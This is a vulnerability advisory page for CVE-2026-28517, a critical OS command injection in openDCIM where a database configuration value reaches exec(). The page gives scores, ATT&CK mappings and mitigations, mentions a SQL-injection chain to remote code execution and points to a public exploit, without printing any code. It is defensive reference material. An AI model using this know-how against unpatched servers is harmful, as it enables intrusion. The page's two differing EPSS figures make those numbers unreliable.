Cyber Resilience

CVE-2026-28517

CriticalPublic PoCRCE

Published: 27 February 2026

Published
27 February 2026
Modified
12 May 2026
KEV Added
Patch
CVSS Score v4 9.3 CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS Score 0.0565 92.0th percentile
Risk Priority 70 floored blend · peak EPSS

Summary

CVE-2026-28517 is a critical-severity OS Command Injection (CWE-78) vulnerability in Opendcim Opendcim. Its CVSS base score is 9.3 (Critical).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 8.0% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and SI-10 (Information Input Validation).

Deeper analysis

openDCIM version 23.04 through commit 4467e9c4 contains an OS command injection vulnerability in report_network_map.php. The application retrieves the dot configuration parameter from the database and passes it directly to an exec() call without validation or sanitization, allowing arbitrary operating system commands to run if the fac_Config.dot value is altered. The flaw is tracked as CWE-78 and carries a CVSS 4.0 score of 9.3.

An attacker able to modify the fac_Config.dot database entry can execute arbitrary commands in the context of the web server process. The CVSS vector indicates the issue is exploitable over the network without authentication or user interaction, so any vector that grants write access to the configuration table, such as a separate SQL injection, would enable remote code execution.

Public references include a detailed write-up on chaining SQL injection to achieve RCE, a functional exploit repository, the vulnerable code locations in report_network_map.php, and pull request 1664 that addresses the issue. The EPSS score sits at 0.3137 with no material rise from a lower baseline.

OWASP Top 10 for Web (2025)

EU & UK References

Vulnerability details

openDCIM version 23.04, through commit 4467e9c4, contains an OS command injection vulnerability in report_network_map.php. The application retrieves the 'dot' configuration parameter from the database and passes it directly to exec() without validation or sanitization. If an attacker can modify the…

more

fac_Config.dot value, arbitrary commands may be executed in the context of the web server process.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.004 Unix Shell Execution
Adversaries may abuse Unix shell commands and scripts for execution.
Why these techniques?

The vulnerability is an unauthenticated OS command injection in a public-facing web application (openDCIM), directly enabling T1190 (Exploit Public-Facing Application) for remote code execution. It facilitates arbitrary shell command execution via PHP exec(), mapping to T1059.004 (Unix Shell).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2026-28516Same product: Opendcim Opendcim
CVE-2026-28515Same product: Opendcim Opendcim
CVE-2018-25115Shared CWE-78
CVE-2025-24382Shared CWE-78
CVE-2026-29058Shared CWE-78
CVE-2024-57016Shared CWE-78
CVE-2024-46484Shared CWE-78
CVE-2015-10145Shared CWE-78
CVE-2020-37002Shared CWE-78
CVE-2026-27848Shared CWE-78

Affected Assets

opendcim
opendcim
23.04

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Requires validation and sanitization of all inputs (including database-sourced configuration values) before they are used in system calls such as exec().

prevent

Enforces access-control policy on the configuration table so that only authorized subjects may modify fac_Config.dot, blocking the prerequisite write needed for command injection.

detect

Mandates integrity verification of configuration data, enabling detection of unauthorized changes to fac_Config.dot that would enable the OS command injection.

References